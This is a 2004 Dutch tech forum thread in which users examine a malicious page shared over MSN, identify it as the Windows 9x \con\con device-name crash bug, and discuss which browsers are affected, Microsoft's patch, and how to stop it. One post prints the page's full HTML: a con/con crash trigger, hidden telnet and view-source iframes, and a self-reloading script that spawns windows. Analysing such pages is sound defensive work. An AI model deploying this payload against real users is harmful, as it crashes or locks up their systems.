Lek in Windows, openen telnet vensters - Privacy en beveiliging

vrijdag 13 augustus 2004 14:14

Acties:

Topicstarter

Iemand op MSN stuurde mij een link die ik onderaan dit bericht noem. Open deze NIET op een machine die je clean wilt houden voor de zekerheid.

Het opend achter elkaar telnet vensters, probeert bestanden te maken en ik weet niet wat nog meer. Ik houd mij windows updates netjes bij.

De link: htp://www.irc-fun.de.vu

Kan iemand mij vertellen of de link schade doet?

LET OP: Ook Mozilla FIREBIRD WERKT HIEROP!
Ik heb de google toolbar in IE, en mozilla heeft een eigen popup blocker. Ook zich ik achter een firewall die iig alle NEW connecties niet toelaat.

Er wordt steeds een telnet sessie naar ik meen 0.0.0.1 geopend.

Het ziet er niet schadelijk uit verder, Norton 2004 laat ook niets van zich horen, maar ik vraag me toch af wat dit is.
Je kunt iig met winXP gewoon met ctrl+alt+del en dan afmelden weer in je systeem komen, of door snel genoeg je browser te sluiten.

Ondernemer in tech (oud LOQED.com, nu UpToMore.com)

vrijdag 13 augustus 2004 14:18

Acties:

André

Analytics dude

* André heeft geklikt

Hmm, gewoon een irritant scriptje wat helemaal niets doet. Het opent een paar notepads en wat telnet sessies. Lijkt meer dan dat het is.

In de pagina wordt deze url aangeroepen:
htp://www.beepworld.de/members47/blablablah/crash4.htm

Ik ben nu de pagina aan het bekijken

Edit:

Die ziet er dus zo uit (ingekort):

code:

<html>
  <head>
    <title>crash4</title>
    <meta NAME='description' CONTENT='crash4' >
    <meta name='keywords' content='' >
  </head>
  <body>

    [img]"file:///c|/con/con"[/img]
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    <iframe src="view-source:http://web.de" width=0 height=0></iframe>
    <iframe src="telnet:0.0.0.1 1" width=0 height=0></iframe>
    [img]"file:///c|/con/con"[/img]
    <script>
      setTimeout("location.reload();",100);
      window.open(self.location.href,"_blank","left=5000,top=5000,screenx=5000,screeny=5000");
    </script>
    
  </body>
</html>

[ Voor 155% gewijzigd door André op 13-08-2004 14:25 ]

vrijdag 13 augustus 2004 14:21

Acties:

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

hier stond onzin

[ Voor 93% gewijzigd door RobIII op 13-08-2004 14:24 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

vrijdag 13 augustus 2004 15:32

Acties:

wildhagen

Blablabla

Hehe, IE in XP SP2 houd dat mooi tegen

Er popt dan een scherm van Help en Support Center op, met de tekst

Cannot display the page
The page you are trying to view has an incorrect address and cannot be displayed. Please try another page.

Virussen? Scan ze hier!

vrijdag 13 augustus 2004 15:40

Acties:

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

wildhagen schreef op 13 augustus 2004 @ 15:32:
Hehe, IE in XP SP2 houd dat mooi tegen

Er popt dan een scherm van Help en Support Center op, met de tekst

[...]

Dat dacht ik ook, maar je hebt zeker de link htp://... ge copy/pasted? Maak er effe http://... van, dan zie je wat de bedoeling was.

De topicstarter en André hebben met opzet die 2e "t" weggelaten zodat react er geen link van maakt en je er dus niet perongeluk op kunt klikken...

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

vrijdag 13 augustus 2004 15:43

Acties:

wildhagen

Blablabla

Idd... dan werkt-ie wél...

McAfee vangt een Exploit-NocNoc af (http://vil.nai.com/vil/content/v_99556.htm) en dit blijkt de bekende \nul\nul bug te zijn (good old times)...

En eigenlijk is het helemaal geen bug, maar een feature die misbruikt word.

[ Voor 19% gewijzigd door wildhagen op 13-08-2004 15:45 ]

Virussen? Scan ze hier!

vrijdag 13 augustus 2004 15:57

Acties:

André

Analytics dude

wildhagen schreef op 13 augustus 2004 @ 15:43:
Idd... dan werkt-ie wél...

McAfee vangt een Exploit-NocNoc af (http://vil.nai.com/vil/content/v_99556.htm) en dit blijkt de bekende \nul\nul bug te zijn (good old times)...

En eigenlijk is het helemaal geen bug, maar een feature die misbruikt word.

En al 4 jaar oud....en hij kan zich nog steeds manifesteren in IE? Niet erg netjes.

vrijdag 13 augustus 2004 15:59

Acties:

Verwijderd

André schreef op 13 augustus 2004 @ 15:57:
[...]

En al 4 jaar oud....en hij kan zich nog steeds manifesteren in IE? Niet erg netjes.

misbruikt MS-argument: it's not a bug, it's a feature!

vrijdag 13 augustus 2004 16:01

Acties:

wildhagen

Blablabla

André schreef op 13 augustus 2004 @ 15:57:
[...]

En al 4 jaar oud....en hij kan zich nog steeds manifesteren in IE? Niet erg netjes.

Het is geen bug, het schijnt iets met backward compatibility te zijn. Ik heb alleen geen zin (en geen tijd) om uit te zoeken wat de oorspronkelijk functie van \con\con ook alweer was.

Wel vervelend is natuurlijk dat het ge-exploit kan worden, maar ja, alleen 9x-machines crashen erop

Virussen? Scan ze hier!

vrijdag 13 augustus 2004 16:02

Acties:

André

Analytics dude

En die crashen eigenlijk alleen maar omdat er zoveel schermen worden geopend

vrijdag 13 augustus 2004 16:05

Acties:

leuk_he

1. Controleer de kabel!

die telnetje zijn irritant. Maar popups zijn dat ook. mooie is dat ze zichzelf weer sluiten.

Wat doet die

code:

1	[img]"file:///c\|/con/con"[/img]

regel?

/edit laat maar: uit bugzilla:

OK, I'm confirming this (chrisn, shouldn't your bugs automatically start off as
NEW?) I crash nasty when loading the above URL. Mozilla is instantly replaced
by a windows blue screen of death. The blue screen says:
"A fata exception OE has occurred at 0028:C0049233 in VDX VFAT(01) + 0000B897.
The current application will be terminated.
*Press any key to terminate the current application.
*Press ctrl+alt+del to restart your computer."

(MS heeft hiervoor een patch uitgebracht in 2000)

[ Voor 62% gewijzigd door leuk_he op 13-08-2004 16:13 ]

Need more data. We want your specs. Ik ben ook maar dom. anders: forum, ff reggen, ff topic maken
En als je een oplossing hebt gevonden laat het ook ujb ff in dit topic horen.

vrijdag 13 augustus 2004 16:05

Acties:

wildhagen

Blablabla

André schreef op 13 augustus 2004 @ 16:02:
En die crashen eigenlijk alleen maar omdat er zoveel schermen worden geopend

Precies, 9x heeft een uiterst brak memory-management.

Voor 9x en ME zijn overigens wél patches uitgebracht, op 16 maart 2000 (het is dus een OS-patch, geen IE-patch): http://www.microsoft.com/...ty/bulletin/ms00-017.mspx

What causes the vulnerability?
The vulnerability results because of a flaw in the way Windows 95 and 98 (including Windows 98 Second Edition) parse file path names. Device names such as COM1, CON or LPT1 are reserved words, and they can't be used as folder or file names. When parsing a reference to a path, Windows 95 and 98 check for the presence of a single DOS device name in the path. If one is found, the path is correctly treated as invalid and an error is returned. However, neither Windows 95 nor 98 check for multiple DOS device names. This is the source of the vulnerability.
If a read or write operation is attempted to a path whose name contains multiple DOS device names, it will cause Windows 95 and 98 to attempt to access invalid resources. In some cases, the effect of this invalid access would be to cause the application that supplied the path to hang, but the more likely effect is that the machine would present a blue debug screen and crash.

[ Voor 55% gewijzigd door wildhagen op 13-08-2004 16:07 ]

Virussen? Scan ze hier!

vrijdag 13 augustus 2004 16:09

Acties:

Verwijderd

hier wordt ie wel afgevangen en heb nog geen SP2 op m'n windows XP ben wel 100% up to date (updater v5)

vrijdag 13 augustus 2004 16:12

Acties:

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Verwijderd schreef op 13 augustus 2004 @ 16:09:
hier wordt ie wel afgevangen en heb nog geen SP2 op m'n windows XP ben wel 100% up to date (updater v5)

Lees dan...
RobIII in "Lek in IE, openen telnet vensters"

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

vrijdag 13 augustus 2004 16:12

Acties:

André

Analytics dude

wildhagen schreef op 13 augustus 2004 @ 16:05:

Voor 9x en ME zijn overigens wél patches uitgebracht, op 16 maart 2000 (het is dus een OS-patch, geen IE-patch): http://www.microsoft.com/...ty/bulletin/ms00-017.mspx

Dus het OS heeft/had een vulnerability die door IE ge-exploit kon worden. Dat is dan zeker het nadeel van een browser die in het OS geintegreerd zit.

vrijdag 13 augustus 2004 16:16

Acties:

Verwijderd

whow idd echt trippend.... dara wordt je echt para van

vrijdag 13 augustus 2004 16:22

Acties:

Reinier

\o/

Topictitel klopt dus niet, het is geen lek in IE maar in Windows.

vrijdag 13 augustus 2004 16:23

Acties:

André

Analytics dude

Reinier schreef op 13 augustus 2004 @ 16:22:
Topictitel klopt dus niet, het is geen lek in IE maar in Windows.

Of in de combi IE-Windows

vrijdag 13 augustus 2004 17:09

Acties:

MrScratch

I am rubber, you are glue

André schreef op 13 augustus 2004 @ 16:23:
[...]

Of in de combi IE-Windows

Negative. Firefox 0.9.1 in Windows NT heeft er ook last van.

Look behind you! A three headed monkey!

zondag 15 augustus 2004 03:07

Acties:

Verwijderd

Titelfix

zondag 15 augustus 2004 03:19

Acties:

Henk007

MrScratch schreef op 13 augustus 2004 @ 17:09:
[...]

Negative. Firefox 0.9.1 in Windows NT heeft er ook last van.

Opera 7.54EN ook.

zondag 15 augustus 2004 21:13

Acties:

Verwijderd

Win XP Home SP1 + IE6 werkt ie tuurlijk ook op, maar het is me wel gelukt hem te stoppen zonder af te melden

. Ik heb hem "gewoon" uit laten razen en aan het eind de groep van internet explorer sluiten met de rechtermuisknop op de taakbalk, en dan geduldig alle kladblok en telnet venstertjes sluiten met dezelfde methode, en als laatst alle telnet.exe processen killen in de taskmanager. (ik had wel 32 IE explorer venstertjes)

zondag 15 augustus 2004 21:15

Acties:

Verwijderd

Volgens mij is de link dood.
Dit werkt dus ook in Opera.

[ Voor 40% gewijzigd door Verwijderd op 15-08-2004 21:20 ]

maandag 16 augustus 2004 13:32

Acties:

alt-92

ye olde farte

/laat /sp11 enzo
* alt-92 zegt : iets verder doorscrollen alvorens te reageren

[ Voor 80% gewijzigd door alt-92 op 16-08-2004 13:33 ]

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

dinsdag 17 augustus 2004 00:01

Acties:

frickY

Is gewoon een feature

Ik gebruik regelmatig de code "view-source:http://.." om een bepaalde pagina door notepad te laten openen. Alleen maar handig
Dit is in principe hetzelfdela als 1000en popupjs laten openen, behalve dat popup blockers hier niets tegen doen...